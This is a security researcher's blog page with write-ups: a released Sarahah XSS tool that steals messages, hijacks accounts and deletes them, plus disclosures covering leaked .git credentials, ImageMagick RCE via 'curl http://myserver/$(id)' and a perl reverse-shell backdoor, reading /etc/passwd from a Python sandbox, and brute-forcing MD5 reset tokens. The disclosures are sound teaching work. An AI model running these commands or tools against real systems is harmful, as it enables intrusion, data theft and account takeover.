• Twitter
  • Facebook
  • Youtube

About me

Let me introduce myself

A bit about me

Shawar Khan is an Ethical Hacker & Security Researcher from Pakistan.

With over years of experience in cyber security, Shawar Khan identified major security flaws in world's well known companies. This includes Google, Microsoft, PayPal, Apple and many others. A huge number of Halls of Fame and Certificates were rewarded as a token of appreciation from these companies. In spare time, Shawar used to develope exploits and web-app penetration testing tools. Some of them are BruteXSS & D-TECT.


Shawar Khan

Personal info

Shawar Khan

A Web Application Penetration Tester and Security Researcher.

Skills & Things about me

Web Application
Penetration Testing
Mobile App
Penetration Testing
Exploit Writing


My latest projects

Saturday, August 19, 2017

Sarahah XSS Exploitation Tool - Compromising Sarahah Users.

Disclaimer: This tool is built to demonstrate XSS vulnerability in Sarahah's web application that was pre-identified. I'm not responsible for any damage done using this tool as it's only built for educational purposes.

Note: Exploit Codes are included again as the Vulnerability is now Fixed.

Hello everyone, this is Shawar Khan and it's been a long time since my last write-up. Today i'm going to release one of my recently coded script that i coded for demonstrating the XSS vulnerability that was identified in Sarahah.

First i'd like to thank "Ronnie" for letting me know about the issue, you can find the article here.

The article demonstrates the XSS vulnerability in Sarahah in a proper way. According to the article, the XSS vulnerability is caused due to insecure reflection of message when new messages are loaded. New messages are not properly filtered which causes the issue. For example a user submitted a simple <script>alert(1)</script> , the payload will be executed if the message is loaded on the next page after scrolling down. 

 Sometimes an 'alert(1)' isn't enough to demonstrate :)

But wait, 
just an alert(1) isn't enough to demonstrate the issue right? Many hackers and beginners think XSS is limited to alert(1) or just a prompt dialogue. So i decided to change this concept and coded the Exploitation Script:

The script is able to perform the following actions:
  • Messages Capture
  • Email Change
  • Account Deletion

How does it works?

Basically, i've coded multiple exploits for each of the action in javascript. This python script actually injects the payload in a target account and then floods the user with around 20 messages so the payload gets into the vulnerable area and executes on scroll.

The tool submits a script tag having eval with atob in order to bypass any protection deployed. The base64 encoded exploit code executes when passed through eval. The site returns an Error if the message contains any '.' character and that is used to deny any message having a link or domain. The protection can be bypassed by encoding the payload into Base64 and passing it into atob with eval. So the template is like:


The site has implemented multiple protection mechanisms that the tool properly bypasses. The scripts loads multiple proxies and submits the exploit code from a different IP address to bypass IP based limitations. This slows down the performance but does the job.

Exploit Codes:

All the XSS exploits i've coded for Sarahah is available on my Github

Account Deletion Exploit Code

Once the exploit code is loaded into the web application, a new invisible iframe element is created which loads the account deletion page in it. Afterwards, the page is submitted using javascript which deletes the account instantly. Due to lack of Click Jacking protection, we can interact with elements inside the iframe due to which we can delete the account.

Email Change / Account Takeover Exploit Code

This is another exploit and it's high in impact it takes over user's account instantly. Once the coded is loaded the exploits loads the settings page in iframe and changes the value of email form field with the once provided by the exploit and submits the page and the email is change. Once the email is changed the user can request a password reset link to the new email and can takeover the account. This code for this is similar to the account deletion code as they works in a same way.

Account Message Read and Capture

This is the best one of these exploits, this exploit goes through all the messages and captures them. Once the code is loaded, the code goes through every page having messages at '/Messages/GetReceivedMessagePage?page='. If requested with a specific page number, returns messages in JSON object form. The response is captured and is sent to a specified logger which is hosted by an attacker. The logger reads and parses the messages and returns them in valid form.

Setting up your system before exploitation:

Modules Required  

  • requests
  • urllib3
  • urllib
  • urllib2
  • ssl
  • glob
  • cookielib
  • bs4 or BeautifulSoup

Before using, make sure you have done the followings: 

  • CORS should be enabled
  • Logger(log.php) should be publicly accessible
  • Your IP or domain where files are hosted should have SSL deployed
  • Victim should be not be an app user


Exploit in Action!

So, each of the exploit is submitted in a way the web application can deny as the code inside is base64 encoded and will not be removed. The coded is then loaded by creating a new script element having source of exploit code available on github. 

Victim's Messages captured by Sarahah XSS Exploitation Script

Generating and Injecting Payload to victim's account


The following is the video of Sarahah XSS Exploitation Tool's Demonstration:

Want the Script?

I've uploaded the script on my Github so you guys can use it. It's available Here.


$ git clone https://github.com/shawarkhanethicalhacker/Sarahah-XSS-Exploit/
$ cd Sarahah-XSS-Exploit
$ python sarahah.py

One last thing, want to protect yourself?

This XSS vulnerability affects the user when the user is using Browser. If the user is using mobile application for android or IOS, he won't be affected as it's properly protected there. So if you want to prevent yourself from getting hacked, use Sarahah's Mobile Application.

Wednesday, May 24, 2017

Pawning the Web - Disclosing top 6 findings

Hello everyone, this is Shawar Khan and today i am going to disclose some of my top 6 findings that i guess were interesting and useful. I am going to disclose these so the viewers can apply the similar methodology and techniques used in the tests. Firstly, i want to let you guys know that each flaw was reported to the vendors and company owners to prevent the risk and i am not going to mention the company name to prevent the reputation damage.

The followings are shown in the write-up:
  • Hacking the Repository and accessing the Private SMS API
  • Viewing Payment information via Insecure API
  • Hacking into the Wind Turbine Panel
  • Getting AES Key and Decrypting encrypted data
  • Pwning the server having 1 million users with ImageMagick RCE
  • Getting Ride Information of any user

These are the findings that i am going to discuss in this write-up, so lets start!

Hacking the Repository & SMS API

Before we begin, i'd like to give an overview about what was done. While pentesting a web application and a bit of enumeration i was able to get into area that was holding the repository where all source code of the web app was available. Through that i hacked into the SMS API which i will show you in a while, the SMS API was used to send SMS from a specific SMS Mask. It was actually used for sending 2FA/Activation code on mobile numbers from a special SMS Mask.

Lets being,
When pentesting an application the most important thing is the information gathering phase, we have to get as much as information about target as possible. Most of the web developers leave sensitive files on the server due to their uncommon names and stuff. Those files  are not publicly available mostly so we have to enumerate and have to detect those files. Similarly, most developers leave GIT directory( .git ) after cloning a repository. This directory holds information about GIT repo and info about all files that were uploaded or deleted. If the GIT repository requires authentication, sometimes developers leave their credentials in the config file. Similar thing happened, first i got the .git directory by enumerating folders:
.GIT Directory Found with Nmap NSE Script

Now if the .git directory is readable or having directory listing, we could simply run the following command to get all the files available in that directory:
wget -m -I .git http://www.site.com/.git/
using the above command and using the git status command we could see all files uploaded and deleted on the web app, it will give us all the structure and all hidden files but what i found was something more interesting. I found that the config file located in the .git directory was having Repository credentials, the following information was in the file:
Directory Listing in the .GIT directory

Repository Credentials Leaking in Configuration File

Now thats interesting! I got a new subdomain which was holding the repository, i could simply clone the entire web app using the git clone command But first lets visit the new subdomain where repository was hosted. By using the credentials found, i was able to access their dashboard:
Dashboard Accessed by using the Credentials found
 After accessing the dashboard, i got access to multiple repositories and i got all the source code and files and also got access to some sensitive server information like database password and other stuff. After digging into it more, i cloned the repository which i guess was having  sensitive information. The applications seems to use Laravel PHP Framework.
 after reviewing each and every file i found something interesting in the /app/Http/Controllers/Auth/ directory. I found some sensitive information in the source code of a file located there which seems to be API information and after confirmation i found 3 SMS API being used along with their credentials:
1st SMS API Information

2nd SMS API Information

3rd SMS API Information
 Finally, i found 3 SMS APIs and their credentials. 2 of them were not working as one of it was deployed in the devices they use. The 3rd API seems to be working and it was having the same username that i found in config file in the beginning of the pentest. I tried using the credentials found in the source code but it was not working as the password was wrong. Bad Luck!, i tired using the password from the config file and it worked! I guess that was the new password. I accessed the SMS API and was able to send SMS to any number with "SMS" MSISDN Mask!
SMS Sent via API with "SMS" MSISDN Mask

It wasn't only the SMS API Hack but also i found some other serious issues that i didn't mentioned in this write-up. Just imagine the risk of leaving a file publicly available, due to that 'config' file i was able to access SMS API. So that's it!

Getting Payment Information via Insecure API endpoint

so, here is another interesting discovery. Many people asked me to disclose some API issues so i decided to disclose some interesting one. In this disclosure i found an API end point where i was able to get Information like "Credit Card Number","Location","User Information" and all other information that was used in the Payment process and also i was able to get a product for free. 

Whenever you are testing for API issues, make sure to get all the end points and understand the logic and flow of the application. Once you know the application flow you will be able to detect API flaws. In in web app, a registration form should be submitted in order to get to product purchase page. Once the transaction is done, an Order/Transaction ID is sent over an insecure challenge via GET method. The order ID can be stolen easily as its not securely transfered. 

Here is how the Registration Request looks like:
Registration POST Request to Registration API end point
after the registration the user is sent to the payment page after which there is the final page for Receipt. When the payment process is completed, the receipt page sends a request to an API endpoint having the Transaction/Order Id. The API end point was:
A GET request to the endpoint above having the Order id will result in complete transaction information in JSON:

Transaction Information in JSON form

 The 'get-lead' API endpoint shows complete transaction information when a Transaction/Order ID is entered, I tried some different Order IDs that i captured and i was able to get complete information of their transaction. In the above image the transaction information was of my orderId so i used null values to hide the info.
As the information was in JSON, i coded a python script to automate the flaw and for gathering the information in a well-readable form:
Transaction information captured using Python Script

I used test information just to show you how it actually works, the real information was sensitive and it can't be shown here publicly. Just by entering an Order ID we can get a complete transaction information. Thats due to insecure 'get-lead' API endpoint.

Hacking into the Wind Turbine Panel

I was given an IP Address of a Wind Turbine Panel for penetration test. All i had to do was to infiltrate into the password protected panel which was having all information about the Wind Turbine. Accessing the IP returned a panel:
Wind Turbine Login Panel
 I tried different methods to bypass and also tried to check if it can be bypassed using SQLI but didn't worked. Sometimes SQLI,Response Tampering,Force Browsing bypasses the password protected areas. But in this case they didn't worked so i tried to understand the flow of the application that how the authentication process was done. Nothing special was found, the panel was having a QR code. I tried some QR Code reader and it redirected to a Mobile Panel. I found that there was another panel specially designed for Mobile Browsers:
The difference between the both panels was that this was fully based on JS. Each functionality was executed using Javascript. I started reading the source code of the panel and found a JS file which was handling the login process:
JS File that controls the entire Application

The 'my-app.js' file was having an entire structure of the application behind the panel, as it was based on JS we can directly call any function. Whenever a similar flow is found, i try to understand how the login is successfully forwarded, by doing a code review of the JS file i tried to understand the response of the application when a valid password is given. The 'logIn()' function is triggered when the credentials is entered, after login the site responds with a message that tells the JS application whether the login was successful or not. An IF/ELSE condition was deployed but in an insecure way, the following is the code snippet that was insecure:
Insecure Code Snippet that led to Login Bypass
An IF/ELSE condition was used in the code, if the site responds with a "usererror" or "pwderror", then it means the login was not successful and the application will execute the 'myApp.loginScreen()' which will show the login panel. If the login is successful, the site returns a message "loginSuc" and then the application executes the "allStart()" and "myApp.closeModal()" function. The first function accesses the functionalities behind the login panel and the second function closes the login panel and gives access to the dashboard. Time for fun! Lets Bypass the panel.
I used invalid credentials to get the site response:
The site responds with 'usererror' message which means the login was not successful, lets change it to a valid response:
Changed the response to 'loginSuc' to fool the application and we'll get access to the Dashboard and Boom! We Got Access to the Dashboard!
Wind Turbine Speed & Temperature Stats

Wind Turbine Energy Consumption Stats

More Stats about the Turbines
 Thats it! We accessed the Wind Turbine Panel!


Getting AES Key and Decrypting encrypted data

When pentesting an android app, its important to know how the application is communicating with the web app and without it its thought to know the communication flow. I intercepted the application traffic and found that the data sent via 'params' parameter was encrypted:
Encrypted data being sent
Not only the data being sent, but also the response was encrypted:

So, the data being sent, and the data received from the web app was encrypted. There was no way i could decrypt that data. The data was not in plain form so i was not able to understand how the application was communicating with the web app and what the webapp was responding. I tried digging up into the application and before that i decompiled the application using apktool:
apktool d application.apk
also i converted 'dex' files to 'jar' using jex2jar:
jex2jar classes.dex
jex2jar classes2.dex

After decompiling and converting the dex files to jar i tried reading the jar file using  'JD-GUI' tool which is pre-installed in kali linux for reading jar files. After checking hundreds of classes available in the 'classes_dex2jar.jar' file i found a class named 'AuthenticateParentActivity.class' which was having something interesting. 

Found the AES Key that was used for Decrypting and Encrypting the data being sent and received! Thats what we wanted and now i was able to decrypt the data being sent and received that means the communication can be read!
Data successfully decrypted using the key! The key should never be hardcoded in the application or any place that could be accessed by a user. I found some more flaws after decrypting the data but i guess you've seen the interesting part! Thats how i found the AES key and decrypted the data.

Pwning the server having 1 million users with ImageMagick RCE

So, here is one of the best RCE i found, it was found in a famous company having almost 1million users. I was able to get into their servers by exploiting the imagemagick service being used. When testing for Remote Code Execution or File Upload flaws mostly the devs miss some points at image upload areas or profile picture change areas. Similar in this case, i found an image upload area. When exploiting ImageMagick, we have to create an image having our command which will send the reverse connection when a vulnerable function is applied on the image.

But in this case, the commands were not working properly and i was not getting reverse connection so i tried executing the curl command with imagemagick exploit:
curl http://myserver/$(id)

and the command was executed! I got a response of 'id' command executed on their server in my apache logs:

The command was successfully executed that means the server was vulnerable but i need to get a fully interactive shell. I tried executing telnet and bash commands to get a shell but the reverse shell closes after 2 seconds. That's because the command stops executing once the code executes so what i did was, i created 2 files:

one file for getting the perl backdoor from my server and the other files executes the perl shell.
I have uploaded the both files in my Github repo so you guys can view:
Launch.png & Make.png

This will do each thing separately which will give full interactive shell.
After uploading each file separately, i got the interactive shell! Rooted the server and got maximum privileges, thats it! ImageMagick Exploited:


Getting Ride Information of any user

 Here is another interesting API issue that i have identified in a Car service. Every pentest starts with information gathering, by gathering information about the target i found an administrator panel. The admin panel was password protected but by gathering some information over Bing i found an API endpoint which was showing location of a ride. The logic of application is, a user requests a ride and travels to a location. The users get a special Booking Id. The API endpoint shows location where the user traveled by taking the Booking Id as input. The endpoint was similar to the following:
If a Booking Id is replaced with the number, it will show the location of the Ride taken by a user. This flaw was found by gathering information of the target using Google Dorks and Bing. Gathering Information is one of the most important phase and simple techniques can lead to serious risk. I gathering some Booking Ids so i can get some user information:

I coded an exploit for this issue and by entering Booking id the Locations is captured:

I've uploaded the exploit code to my github so you can see the code: Ride Information Gather Exploit 
Just by finding insecure APIs in the target web application we can discover interesting issues, i hope that you guys will love this.

Thanks for viewing, please share and comment if you like this write-up.


Shawar Khan
Security Researcher

    Monday, May 1, 2017

    My journey to Ethical Hacking

    Greetings everyone i hope you all are doing well. Today i want to share my journey to ethical hacking and things that i have experienced in my career and things i did to be an ethical hacker. This article is to motivate the young security researchers and the beginners, so they can start to learn from things that i have experienced and can apply them in their life. So, everything started due to interest in computers as i was a computer enthusiast. It is a dream of every person who is interested in computers to know more about it as much as they can so that was my dream to i always wanted to know about it as much as i could. Back in 2011 some of my Facebook friends discussed that their accounts were hacked, at that time i had no idea about what it was and afterwards i came to know that someone got their credentials and i was shocked that how it was possible. After some days one of my family member became a victim of cyber-attack. That was the time i had to do something about, i tired contacting some people who were claiming that they were hackers and can hack into accounts, i spent a long time asking them for help and i begged them to get their accounts back and what i got in response was their laughs. Some people insulted me by saying that i got zero skills in programming and i can’t ever learn this. Some people said they learned it by learning programming and some said they learned by themself. So that was a point where you can say was a turning point, no one helped at the tough time so i decided to go for myself in order to learn something.

    Well, i started googling about how to hack stuff and etc. Like every person, what i got was some weird Facebook hacking softwares that never actually worked. I learned that they were not the way to hack into stuff. The rejections and demotivation always made me keep the passion alive and i kept on search for stuff and i ended up with Phishing attacks and Keyloggings. I became familiar with those tricks and found them useful, after successful attempts i started learning more about how these things happen. This was the skill i always wanted to attain. But i found that these were the dead end, in these conditions what i always do is to switch to something else and learn new stuff i did the same and found some posts of people who hacked into websites. I was amazed by seeing how they got controls over an entire website which was a new thing for me i tried googling stuff once again as no one was there to help me. I found some methods like SQL Injection using which i was able to hack into site’s database where all information where stored and all passwords, i learned that technique and found admin credentials but i was not able to go further as passwords were hashed(was not in clear form, was not readable). I left learning about that for a while as i was not able to find the solution, i was the one struggling on my own, i found some online sites which were able to crack hashes like hashkiller and etc. I used them to get into the website and that was the fun part where i got control over a website. What i wanted to do next was to learn more about it like i always do because i wanted to achieve more about what i was doing. I saw some youtube videos and stuff and learned about Shelling,Rooting and compromising Cpanels. After learning all these i was able to hack into websites, computers and accounts.

    So after keep doing those stuff i felt like the cycle was repeating again and again. Just like other defacers and hackers i went into something that repeats and what i wanted was to achieve more rather than just repeating stuff. I knew how insecure the people and websites were and as i was a victim of cyber attacks, they were too. I always wanted to help people so they could survive in the situations which i experienced. At that point i wanted to get out of the repeating cycle(loop). I discovered that there were hackers that were helping people and i saw people getting listed in websites and getting gifts, that was the good side where i always wanted to be and it was the ethical hacking as it was positive use of skills which i wanted to do. I reported the vulnerabilities(securtiy flaws) to the website owners that i discovered in early days.

    This was the time when i turned into White Hat. I reported the flaws to famous companies like BMW and others. The response were really motivative and that was something which kept the passion alive. I kept reporting random sites and all i learned at that time were the two attacks(XSS,SQLI). I reported these issues to over 20 sites and one of them asked my address to give me a gift i was really happy to hear that and it was a watch that i received from a company in Hong Kong. For a normal person it was a great achievement for me to receive a watch from an international company as i never received any gift before(I still keep that watch just to remember what i was in the past). A few sites listed me in their Hall of Fame page where names are mentioned of security researchers who helped them secure their site. When i got 3 Halls of Fame an announcement was made at my school just to appreciate me and my interview was taken by a company. It was quite impressive, i set a target to achieve 15 Halls of Fame which i completed in a quick time and i wanted to achieve as much as i could so i keep hunting websites and helped them secure.

    I was a normal guy hunting sites with XSS and SQLI only. Almost every report was an XSS vulnerability as i knew nothing else at that time. I made some friends in the social network and helped them in learning new stuff. I was satisfied for what i achieved and what my next goal was to help people that were suffering from condition that i was in. I wrote some articles, released some videos of how i hunted each site and things so people can learn from it. Suggested some books to people and helped them in each and every situation because i never wanted them to face rejections and demotivation that i faced. I started learning more techniques from Google and ended up with books like “Web Application Hacker’s Handbook” & “OWASP Testing Guide v4”. These were the books that were available in PDF form for free. I gave some time to it and studied them. It was really tough for me to learn all those stuff so i learned about how web apps work and about different CMS(Content Management Systems). I wanted to focus more on XSS as i was familiar with it so i watched some videos of people and some conference talks on youtube which gave me a quick push against the penetration testing.

    I learned some new attacks and felt that i was in the right place and all i needed was experience so i could learn more(Never wanted the cycle to repeat). Once i got enough experience and knowledge i started training people who were new to cyber security and hacking. It was a quite good time as i learned much from teaching them and it is always satisfying when you are training someone. But in the same time i found that some people were still into bad stuff like defacers who are still defacing people’s sites. They are still targeting people for no reason except stamping and proving that they owned the site. I talked to some people and focused on helping them get to the right side and i wanted to get their skills on the good side because for a limited time it was fun but they had no idea about what they were doing.

    Finally, after some struggle i was able to change their mind and they came on the good side in Ethical Hacking. Those people are now well known ethical hackers and many of students got hired by companies and many of them are in news and are interviewed by top companies. It is always good to make people get on the right path no matter what you have to sacrify. No matter what position you are today at, just always remember who you were in the past and all you have to do it to help people rise so they can further help people who are down.

    To all those hackers,beginners and people who are reading this i’d say that Attain the Skill, Contribute to the community, Help those who are really in need and you will get the satisfaction you never had. Being a security researcher just make sure to always be on the good side. This isn’t limited to hacking, being on a good side you should also help the community and the people so they can achieve the skill and can learn the positive use of it.

    Rising from a normal guy to a security researcher isn’t an easy journey. People will always demotivate you,reject you and will always let you down no matter what. This is the stage which is really difficult to face and that’s the only thing every person should learn is to keep the passion alive and to keep himself up.

    Still many people are trying to defame me by targeting my social accounts, website and stuff but they can never stop me from achieving my goals and can never destroy the passion i have. When i was admitted in the Hospital, my website was compromised and people started judging my skills but what they say doesn’t matter, all you have to do is to get self satisfaction and no one expect you knows who you really are. The people in the community should help each other rather than just making people down and stopping them from achieving their goals. Being a hacker isn’t the important thing, being a successful person is the important thing and that can be only done by helping the community rise.

    Being a security researcher, it is really tough to keep yourself up to date. I’d ask the beginners to focus on self study and learn things by themself as everything is possible all you need is the passion of taking a step after that you can achieve anything. Still the passion is up and i am using my skills to help people getting secure in the cyber space. Now i am listed in almost 90+ Halls of Fame, have 30+ Certificates, and got acknowledged by over 300 companies which are well known. Some of them are Google,Microsoft,Oracle,Sony,Dell,Amazon,Ebay. These are a few companies that i have named and i am glad that i finally proved that nothing is impossible to achieve. All i achieved was by doing self-study and self motivation and without any certifications. You are never a perfect person, but you are still better then the rest of the people. For being a security researcher, all it takes is the passion to achieve something. I hope this article helped you motivate to take a positive step in life, Share the article so we can help the community rise 🙂

    Shawar Khan
    Security Researcher

    Wednesday, April 12, 2017

    Pwnage of every user due to Weak Encryption

    Greetings everyone, this is Shawar Khan and today i wanted to share one of my recent findings. Recently while pentesting a private project i faced a type of weakness in the web application that i am going to share today. The application that i was testing was fully accessed after the penetration test but in this write-up i am only disclosing an issue which i think is interesting and the developers and researchers can look into it while performing pentests against the web applications.

    So, i started the pentest against the web application and checked ever area which was publicly available and found some flaws so after that's done the next steps comes in which we have to check the auth mechanism.
    As we know the critical flaws are discovered when it comes to functionality that is responsible for changing user passwords and stuff so i moved towards the password reset functionality.

    Simply registered an account, requested a password reset token which looks like:

    Password Reset Link sent to User's Email via Web-App
    Once the password reset link is requested, an email is sent to user's email which is associated with user's account. The email contains a link as shown above which contains "email" and "token" parameters. These parameters tells the web application that the specific user want to change his password. The "email" parameter's value will be the email of user which is requesting the password change and the value of "token" is a special md5 hash.

    How the hash works in this mechanism? 

    Each hash that is sent in password change request is associated with a user account so if the token or hash is having the same email which is associated with it then it will allow the password change. Otherwise, the password change request will be rejected as if the hash doesn't match with the email.

    Exploiting the mechanism

    Now as we understood how it works, its time to exploit it. I tried replacing the 'email' parameter's value to someone else's email address to check if its an IDOR vulnerability but that doesn't works. In these type of situation the only solution is to check how the hash was made.

    The hash was identified as MD5 so i tried cracking the hash and i successfully got the plain text after the decryption of that hash which was sent in the reset link. In my case it was "d9d4f495e875a2e075a1a4a6e1b9770f":
    Decryption of Password Reset Hash

    So the decrypted value of the hash was "46". We now know that they are using numbers as tokens. Now its time to check if the same token or number was being used as token for every requested link. I requested some more links and decrypted them:
    Decryption of 4 Password Reset Hashes
    So after a little observation i found out that the numbers that were between 0 and 1000. The number was not crossing 1000 so maybe they are using some kind of random function to generate numbers between that specified range. Now we know how the hashes were generated now its time to fire up the weapons. We can bruteforce the password reset link hash but first we need to create the list of payloads.

    I coded a little script that will generate hashes of numbers from 0 to 1000:
    Generation of MD5s
    Now we got a list of hashes from 0-1000 that we will be using to bruteforce the "token" parameter and one of them will be the correct value which will reset the user password. I coded a script that will use those hashes and will bruteforce the "token" parameter and the script prints the valid hash and URL for resetting password of the specified user.
    So the final exploit looks like this:
    Final Exploitation
     So, as we are now able to generate a valid password reset hash for any user of the site, we are able to compromise any user of the site by just entering his email. One of the request between 0-1000 will succeed which will allow us to compromise the user account. 

    Thats it!
    I hope you like this write-up, make sure to share so people can learn more from this.


    The following is the Github link to scripts that i coded for exploiting this weakness:
    Github: Github Repo

    Monday, April 3, 2017

    How i was able to read server files with Python

    Greetings everyone, this is Shawar Khan and i hope you all are doing well. It's been a while since my last write up, so i decided to disclose one of my recent findings that i have identified in a top web application.  Recently i found an issue that allowed me to read files on server with Python, that was due to lack of protection and i will show you how i did it, It's quite simple.

    So while i was practicing python coding i decided to apply the coded script on the web app, there were a few applications that were using python and i was able to execute python there. Some of these are online tools that execute languages online. Python is the simplest and the powerful language as it contains the easiest syntax with powerful control. There are many commands and modules that can be used to compromise systems and applications by in this write up i will demonstrate how i read the files.

    So, lets move towards the interesting stuff, I went to the area where python execution was possible, a normal "print('Shawar Khan')" command returns the following results:

    So as you can see that after the "Output:" you can see the result of the command, now the only thing that pings while executing programs is the execution of system commands, so i tried executing system command using the "os" module.


    import os


     The system command was not executed as the "syscall" was blocked, they were not allowing us to execute the system command, so i tried the "subprocess" module to do the same trick:


    import subprocess


    Okay, so same issue with this one, they were blocking all commands that execute system command so this trick failed. In similar cases we are able to execute system command and are able to get full control over the server using this trick but in this case i skipped this one and moved on to reading the server files. I tried the 'open()' to open or create a file on the server.

    i found that the server was not giving me write permissions and i was not able to write files on the server but i was able to READ file that means i was having read permissions. So using that i was able to read server files by directly calling them using 'open()' with read option. The following was my code for reading /etc/passwd file:


    f = open('/etc/passwd','r')

    for i in f:
        print i.strip('\n')


    So, i was successfully able to read files on the server and was able to call them as i was having read permissions. These simple tricks can be handy wile performing pentests against web apps like these. 

    Thats it, share the write up if you like it!

    Tip:~$ #Where there's a Python, there's a way.

    Sunday, March 5, 2017

    WhatsApp - 0day Vulnerability in IOS & Android

    Greetings Everyone

    Today we are going to share the 0day that we have discovered in WhatsApp. Our team(Muhammad Uwais, Kunal Khubchandani, & Shawar Khan) identified a 0day vulnerability in WhatsApp Mobile Applications(iOS & Android). The Followings are the details:

    Bug: Buffer Overflow App Crash Denial of Service Vulnerability
    Affected Versions: All Whatsapp Versions prior to "2.17.79"

    Platform: IOS & Android
    Researchers: Muhammad Uwais, Kunal Khubchandani, Shawar Khan
    This vulnerability allows a remote attacker to crash the target victim's mobile application. This affects both version of Whatsapp which include Whatsapp for IOS & Whatsapp for Android. 

    Recently Uwais joined WhatsApp and started the Pentest against the application as thats what a hacker does at start, identifying security flaws is the first step every hacker performs. Recently a flaw was discovered that allowed attackers to crash victim's whatsapp by sending a message containing unknown characters and recently a guy found that he could crash Whatsapp Ios Version by 2 emojis if you know those are rainbow and a white flag . According to Uwais:

    I decided to make up a contact file and add up few emojis "Smiley Face" in the area of Contact name that is shared . Luckily my mobile Xiamoi Mi 3 allowed me to add emoji's and characters as many as I want .Then I shared this contact nothing happened , I added bomb emoji with other 30 smiley face emoji's. Then I send the contact to Kunal while opening his chat I noticed a slightly delay of 1.5-2 secs than usual time while opening his chat.
    Uwais noticed this behaviour and asked Kunal to have a look into it because of limited access to computers at my college .

    So he made the other contact i.e the contact named with bomb emojis which caused delay , then Kunal copied that message(contact) and only added characters of "bomb" emoji's and then he kept on multiplying the bomb emoji's and kept on testing its response (delay) in opening the conversation (message) .

    He noticed a lot of serious lagging and I couldn't type back in the conversation while testing on android application , and again he added more and more bomb emoji characters around 5000 then he sent the contact to me on my phone, as soon as I opened his chat the mobile screen turned black and bamm whatsapp crashed !! As some phones couldn't store emoji's as the contact name so he used 3rd party app from playstore to create a contact like that . As for now we are sure all Android devices along with the whatsapp versions were affected if contact was shared with name containing around 5000 Bomb emoji's.

    It was time to test ios devices , so we messaged another friend named Shawar Khan who is also a Cyber Security Researcher & WhiteHat Hacker from Pakistan and we asked him to test ios device as he is an IOS Application Penetration Tester .
    I(Uwais) sent him the same contact , this time the results we noticed were crazy. 

    His phone started lagging and his whatsapp crashed on the pressing of his home button on his iPhone. The payload was further modified by Shawar and a much powerful payload was created which caused a complete application crash of the Victim's device. To handle this such huge payload a powerful device was required as Android devices was not able to handle it, Iphone 6s was used to send the modified payload and was successfully able to takedown any WhatsApp Conversation / Group.

    So finally we are confirmed that it effects every phone rather it's an iOS or android 😉 .

    All versions prior to 2.17.79 were affected . Along with the app crash main ios was also affected.
    The vulnerability was reported to Facebook and is now fully patched.

    Android to Android(Demo by Kunal)

    IOS to Android(Demo by Shawar Khan)



    What can I do

    Web-App Penetration Testing

    Provides a complete Penetration Test against the web application in order ensure its safety.

    Android App Penetration Testing

    Provides Android Application Penetration Testing in order to make the app & secure.

    iOS App Penetration Testing

    Provides iOS Application Penetration Testing in order to make the app & secure.


    Get in touch with me